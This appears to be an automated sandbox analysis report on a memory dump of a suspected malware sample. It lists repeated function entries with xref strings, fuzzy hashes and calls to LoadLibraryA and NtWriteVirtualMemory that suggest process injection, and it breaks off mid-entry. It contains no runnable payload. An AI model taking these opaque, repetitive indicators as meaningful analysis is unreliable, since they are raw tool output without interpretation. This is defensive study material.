KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: 1fc6201d1ae554649d508b1e97996a53362183a8c84bbd056297f6ab7452ef40
Instruction ID: da64f22b232859541283fc8dbac0db349138c2244c8191356853ef9c0f599864
Opcode Fuzzy Hash: 1fc6201d1ae554649d508b1e97996a53362183a8c84bbd056297f6ab7452ef40
Instruction Fuzzy Hash: 9452EAB2604289DFDB758F38CD457DABBB6FF98310F418129DD499BA24D3309A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B5ED9, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 615COMMON

Download Yara Rule

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: 5fbf3932fccb89ee1750190fc950c751bf604a0bb85d3c57cfd935d330761e6f
Instruction ID: 2148a1d1a8e5fcb069a74ea250d8fa7cc6549c6bc4e2bce09cf2fb99d45b0ada
Opcode Fuzzy Hash: 5fbf3932fccb89ee1750190fc950c751bf604a0bb85d3c57cfd935d330761e6f
Instruction Fuzzy Hash: EC42EAB2604289DFDB758F38CD457DABBB6FF98310F418129DD499BA24D3309A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B5EE5, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 612COMMON

Download Yara Rule

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: e6c6251d824ed720dc124bcbb0be8291550ec5d82a0ee8ab338c36f0167ee183
Instruction ID: 8eb7e732920778437b9a2e4b87888c9de574f0709ca8b7b05fedab5c18192047
Opcode Fuzzy Hash: e6c6251d824ed720dc124bcbb0be8291550ec5d82a0ee8ab338c36f0167ee183
Instruction Fuzzy Hash: C742DAB2604289DFDB759F38CD457DABBB6FF98310F418129DD499BA24D3309A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B5F11, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 605nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 023B94E5: LoadLibraryA.KERNELBASE(?,74943F2C,?,023B772D,07B490AF), ref: 023B9684

NtWriteVirtualMemory.NTDLL(?,A9312851,?,00000000,?), ref: 023B6CBD

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 3569954152-2385936248
Opcode ID: a96eb4b80f748b4f09ed3c038233da6c2ae601e5e4b1220708a4b3566b8d9eed
Instruction ID: d698d2f356afc7778fd8b3b8932cad49b5bf9aeea148f4f5a98b1bc50dce9260
Opcode Fuzzy Hash: a96eb4b80f748b4f09ed3c038233da6c2ae601e5e4b1220708a4b3566b8d9eed
Instruction Fuzzy Hash: 1442D9B2604289DFDB759F38CD457DABBB2FF99310F418129DD899BA24D3309A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6041, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 586COMMON

Download Yara Rule

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: 11b01c27aa143acc8f822910964fde778c5f13dde6da749ff776b8180d662bc8
Instruction ID: 609985e5f85184903baa2aacff1c7cf3baac8a1570844b4ec82eb24bbc9ee9ff
Opcode Fuzzy Hash: 11b01c27aa143acc8f822910964fde778c5f13dde6da749ff776b8180d662bc8
Instruction Fuzzy Hash: CA42DAB2604289DFDB758F38CD457EABBB6FF99310F418129DD499BA24D3309A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6059, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 581COMMON

Download Yara Rule

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: faff0e45f4a82360a1a522b295f69086ca54f269b454cae2f946dd8d7166b86c
Instruction ID: 98453a27e5cf15e3b3c792af6cdc25ea14ae34d5983728bde01b2506c0ddcfc2
Opcode Fuzzy Hash: faff0e45f4a82360a1a522b295f69086ca54f269b454cae2f946dd8d7166b86c
Instruction Fuzzy Hash: 5B42D9B2604289DFDB758F39CD457EABBB6FF98310F418129DD499BA24C3309A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6065, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 580COMMON

Download Yara Rule

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: 0d24a35a57ff53d034a4051b10e2ba8ac6b0b02607043605c75405177d3fa218
Instruction ID: 9ad8b47756a9da1ac84d09fa05bed36e29558c79d6f7a24f7a6c3589f5eb6d99
Opcode Fuzzy Hash: 0d24a35a57ff53d034a4051b10e2ba8ac6b0b02607043605c75405177d3fa218
Instruction Fuzzy Hash: B442E9B26042899FDB758F39CD457DABBB6FF98310F418129DD499BA24C7309A82CF41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6029, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 577COMMON

Download Yara Rule

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: 69800d93dca68507ae0f4d4007650a9f2b29c0dd2f6f1f5675b85417a7d823a6
Instruction ID: 87b1e8fa10dc7a18619b9fa8a8529d5991f4b380a85022bc87abe23110299044
Opcode Fuzzy Hash: 69800d93dca68507ae0f4d4007650a9f2b29c0dd2f6f1f5675b85417a7d823a6
Instruction Fuzzy Hash: AC42EAB2604289DFDB758F39CD457DABBB6FF98310F418129DD499BA24C7309A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6035, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 575COMMON

Download Yara Rule

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: ba0e38d64c2a3ec52fe88d72aed9fa085864ebdbf2c6cee8f906cc314e6a1151
Instruction ID: c8d2b6fb4611d4b7b3027ca7250c39551b5e948cbdef01b902cc3c7ecfc107f0
Opcode Fuzzy Hash: ba0e38d64c2a3ec52fe88d72aed9fa085864ebdbf2c6cee8f906cc314e6a1151
Instruction Fuzzy Hash: 2C42DAB2604289DFDB758F39CD457DABBB6FF98310F418129DD499BA24C7309A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6071, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 575nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 023B94E5: LoadLibraryA.KERNELBASE(?,74943F2C,?,023B772D,07B490AF), ref: 023B9684

NtWriteVirtualMemory.NTDLL(?,A9312851,?,00000000,?), ref: 023B6CBD

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 3569954152-2385936248
Opcode ID: e3ef101fc9a097eead5e66622b92d609c3d3f5c4efdd10a7a87fa95fc0b410c5
Instruction ID: 42c69e1c23cd087b72551c899ac3756fe817019815c185eeccdc5da3b3a0c1a8
Opcode Fuzzy Hash: e3ef101fc9a097eead5e66622b92d609c3d3f5c4efdd10a7a87fa95fc0b410c5
Instruction Fuzzy Hash: 5D42DAB2604289DFDB758F39CD457DABBB6FF98310F418129DD499BA24C3309A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6155, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 570COMMON

Download Yara Rule

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: b2d335ee001cfbed93c5e120fd387ee7877955b546e8799770e998233aa3616e
Instruction ID: 0e397187d477c9a20f27b78f896ba6a5fa0f02833d134e091e5e1155d9b2fb83
Opcode Fuzzy Hash: b2d335ee001cfbed93c5e120fd387ee7877955b546e8799770e998233aa3616e
Instruction Fuzzy Hash: F742EAB2604289DFDB758F39CD457DABBB2FF59310F418129DD899BA24C7309A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B616D, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 545COMMON

Download Yara Rule

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: 7e8072f5e70efb72facb3daf17aabc99742b499e592c4af913ff3eeffc9c7647
Instruction ID: 6439afeb2012bea06c555ad2ec5aa1b5fc55eb885f110724c98223807403e55b
Opcode Fuzzy Hash: 7e8072f5e70efb72facb3daf17aabc99742b499e592c4af913ff3eeffc9c7647
Instruction Fuzzy Hash: 5132D9B6604289DFDB758F39CD457DABBB6FF48310F45812ADD499BA24C3309A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6179, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 543COMMON

Download Yara Rule

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: da814243a6272547629965e12b1ad702b02f90579adf7f661db0d4f6bc870d9e
Instruction ID: d61bfd6fa350051f9888a4cba729146939b6443fba264e75e14eb2fd3012fefb
Opcode Fuzzy Hash: da814243a6272547629965e12b1ad702b02f90579adf7f661db0d4f6bc870d9e
Instruction Fuzzy Hash: 8832D9B2604289DFDB758F38CD467DABBB6FF48310F45812ADD499BA24C3309A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B613D, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 540COMMON

Download Yara Rule

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: 43c5055f480656ec39380da6b21d975a6260b58e7473783b460008469c34eab0
Instruction ID: e8ce42cf3c7aee748520e306725854a38aa639c8ee3f712a5b53c4cb045d8681
Opcode Fuzzy Hash: 43c5055f480656ec39380da6b21d975a6260b58e7473783b460008469c34eab0
Instruction Fuzzy Hash: 5F32E9B6604289DFDB758F39CD467DABBB6FF48310F41812ADD499BA24C3309A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6185, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 528nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 023B94E5: LoadLibraryA.KERNELBASE(?,74943F2C,?,023B772D,07B490AF), ref: 023B9684

NtWriteVirtualMemory.NTDLL(?,A9312851,?,00000000,?), ref: 023B6CBD

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 3569954152-2385936248
Opcode ID: d52460b25127d9f9827a5e12f7b3a7c3d9fe0cb37c504af0eebefe33ad5cda98
Instruction ID: bc878f1b4907d87c113b1e8a366ae21341efa48f4d37aab4f7222b93bf71e8e6
Opcode Fuzzy Hash: d52460b25127d9f9827a5e12f7b3a7c3d9fe0cb37c504af0eebefe33ad5cda98
Instruction Fuzzy Hash: 1C32D9B2604289DFDB758F39CD457DABBB2FF58310F41812ADD499BA24C3709A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6251, Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 509COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$$M$KV$`1$d-
API String ID: 0-591059297
Opcode ID: 2993665c875bb08cb0b2401e5ace3c312c91ff09298cbc40a75eca7c6e4915df
Instruction ID: bbb0905b92ee1eba5927ab1e3ac37fa4d1b86d8f5c5ed62ac727eaa98a3064a5
Opcode Fuzzy Hash: 2993665c875bb08cb0b2401e5ace3c312c91ff09298cbc40a75eca7c6e4915df
Instruction Fuzzy Hash: DE22FBB26043899FDB758F38CD467DA7BB2FF98310F458129DD499BA24C3709A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6281, Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 502COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$$M$KV$`1$d-
API String ID: 0-591059297
Opcode ID: 6e790ff7ec5c73e056331811f508d5efd60b7bbb5f5438db906cb75178d87bd9
Instruction ID: 9f84ea48c7bcc32d56be58708d2a6b26c1bfc2fd77147ef9434171275fdebdbc
Opcode Fuzzy Hash: 6e790ff7ec5c73e056331811f508d5efd60b7bbb5f5438db906cb75178d87bd9
Instruction Fuzzy Hash: 7622DAB66042899FDB758F38CD457DABBB6FF98310F45812ADD499BA24C3309A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B628D, Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 497COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$$M$KV$`1$d-
API String ID: 0-591059297
Opcode ID: cdd8e1a1e1031d7369f3b7e4972943c99c5ec0bd9c1f3a57c9664ea9815b61b7
Instruction ID: be3fcedc5db99fcc3882950ab412a84ab5ec3b6580ca7e9f7f70810c39f528bd
Opcode Fuzzy Hash: cdd8e1a1e1031d7369f3b7e4972943c99c5ec0bd9c1f3a57c9664ea9815b61b7
Instruction Fuzzy Hash: 2822EAB6604289DFDB758F38CD457DABBB6FF98310F41812ADD499BA24C3709A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B625D, Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$$M$KV$`1$d-
API String ID: 0-591059297
Opcode ID: 91338f736a0eb9c053922fb59502fc30a7e5e0a920d341497737f052283d4c23
Instruction ID: aec6fa364579f7a47948ab6754972c785ef0737ea186712554d12e535ac1c3be
Opcode Fuzzy Hash: 91338f736a0eb9c053922fb59502fc30a7e5e0a920d341497737f052283d4c23
Instruction Fuzzy Hash: 5022EAB26043899FDB758F38CD457DABBB2FF98310F41812ADD499BA24D3709A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6269, Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 492COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$$M$KV$`1$d-
API String ID: 0-591059297
Opcode ID: 2bb326867a9f2ed62b39cd11ee7f8341f7c7ac64117011b978e29031dd1f9e72
Instruction ID: e1fb4f070f7d7db33243c2309f7ef99147d405762754ebb7afe01212ec67599d
Opcode Fuzzy Hash: 2bb326867a9f2ed62b39cd11ee7f8341f7c7ac64117011b978e29031dd1f9e72
Instruction Fuzzy Hash: 5222EAB26043899FDB758F38CD457DABBB2FF98310F41812ADD499BA24C3309A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023BBBCC, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 200COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$$M$KV$`1$d-
API String ID: 0-591059297
Opcode ID: b657ed795989900cbf8d114a70dda0ada625eb5314c9e9d2291aaaf386a174e7
Instruction ID: 0440dba62b2f4d61aa71168754d82f8b656080a5f6656c5bee548f8d97b59add
Opcode Fuzzy Hash: b657ed795989900cbf8d114a70dda0ada625eb5314c9e9d2291aaaf386a174e7
Instruction Fuzzy Hash: D1811531604788CFDB3ACE28D9A47EA77B2AF98344F11411EDD4A8FA55CB35DA41CB01

Uniqueness

Uniqueness Score: -1.00%

Function 023B6389, Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 459COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$$M$KV$`1$d-
API String ID: 0-3096506169
Opcode ID: ed8115ab535f3b1d084b05cb8e7730eabb8a799cfbf06c23929b8bf32f8c8a0c
Instruction ID: 28aeeb7417d23f71b9f7bda5b7c4094ee47e1fdedafaf7d1eab8bb12e27c3fb6
Opcode Fuzzy Hash: ed8115ab535f3b1d084b05cb8e7730eabb8a799cfbf06c23929b8bf32f8c8a0c
Instruction Fuzzy Hash: 1712E9B66042889FDF758F38CD467DA7BB6FF98310F41812ADD499BA24D3709A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6395, Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 455librarynativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,A9312851,?,00000000,?), ref: 023B6CBD
LoadLibraryA.KERNELBASE(?,74943F2C,?,023B772D,07B490AF), ref: 023B9684

Strings

$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: i&Hh$$M$KV$`1$d-
API String ID: 3569954152-3096506169
Opcode ID: 1f914ffa453b0cb34f62d5c3e5204c501e540320e28abaad16356858e8a2f104
Instruction ID: 70e6e0adbae745bbcc7d9bae7e63d2ef0b36a8c8eb41b0e06a6ada0c42e6fada
Opcode Fuzzy Hash: 1f914ffa453b0cb34f62d5c3e5204c501e540320e28abaad16356858e8a2f104
Instruction Fuzzy Hash: 2212D9B66042889FDF758F38CD467DA7BB6FF98310F41812ADD499BA24D3709A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B635B, Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 453COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$$M$KV$`1$d-
API String ID: 0-3096506169
Opcode ID: 32b497d301493d6977712f2b5168d4c3f125304af125b2072ea3b5920901467f
Instruction ID: acbd20048d5dfaf8f73dc3046764c211a9d561c54cc5142f5ae6cf0efb4c5cad
Opcode Fuzzy Hash: 32b497d301493d6977712f2b5168d4c3f125304af125b2072ea3b5920901467f
Instruction Fuzzy Hash: D712D9B6604288DFDB758F38CD467DA7BB6FF98310F41812ADD499BA24D3709A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6365, Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 450COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$$M$KV$`1$d-
API String ID: 0-3096506169
Opcode ID: 0aaf1307bfcdd1d876362d74e3d2969167e57aac652f73d5d0271a657affc3d0
Instruction ID: 3cade1131b1f026662447d941f684298ab160c1782fcfde9e509a450f93813a0
Opcode Fuzzy Hash: 0aaf1307bfcdd1d876362d74e3d2969167e57aac652f73d5d0271a657affc3d0
Instruction Fuzzy Hash: 3912D9B66042889FDB758F38CD457DA7BB2FF98310F41812ADD499BA24D3709A85CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B637D, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 444COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$$M$KV$d-
API String ID: 0-1654336934
Opcode ID: 05a06b16edab51aeaef3dc4859aa08ef00f2a18081ba25e9d3570bca0f90bd06
Instruction ID: 53c013015974c8f16741dbfb2100a540e58dff7a4a357323ed4e0ff154c10f62
Opcode Fuzzy Hash: 05a06b16edab51aeaef3dc4859aa08ef00f2a18081ba25e9d3570bca0f90bd06
Instruction Fuzzy Hash: 2712D8B66042889FDB758F38CD457DA7BB6FF98310F41812ADD499BA24D3709A81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 023B646D, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 425COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$KV$d-
API String ID: 0-317857802
Opcode ID: 81d34cee5de100c75a6c20dd1f1d5c9d471f5fd7afb55b6daa92994f490b688b
Instruction ID: 98d6f3179c5b40e2172d15e5583d19ad73876b0774469bf4525147bd565577bd
Opcode Fuzzy Hash: 81d34cee5de100c75a6c20dd1f1d5c9d471f5fd7afb55b6daa92994f490b688b
Instruction Fuzzy Hash: 93020BB6604288DFDF76CF38CD467DA3BA6FF98310F41802ADD499B614D7709A818B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6491, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 420COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$KV$d-
API String ID: 0-317857802
Opcode ID: 0d068a6a4c5a71f8c60b519dc45cd833d92da069be17db2156b7f6c2ee892d05
Instruction ID: 9dcc9ca8237ffa9ef0ae795c992f30b08d0e10fa72487656686afc148bc40362
Opcode Fuzzy Hash: 0d068a6a4c5a71f8c60b519dc45cd833d92da069be17db2156b7f6c2ee892d05
Instruction Fuzzy Hash: 1402FBB6604288DFDF76CF28CD457EA7BA6FF98310F41802ADD499B624D7709A818B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B649D, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 418COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577

Memory Dump Source

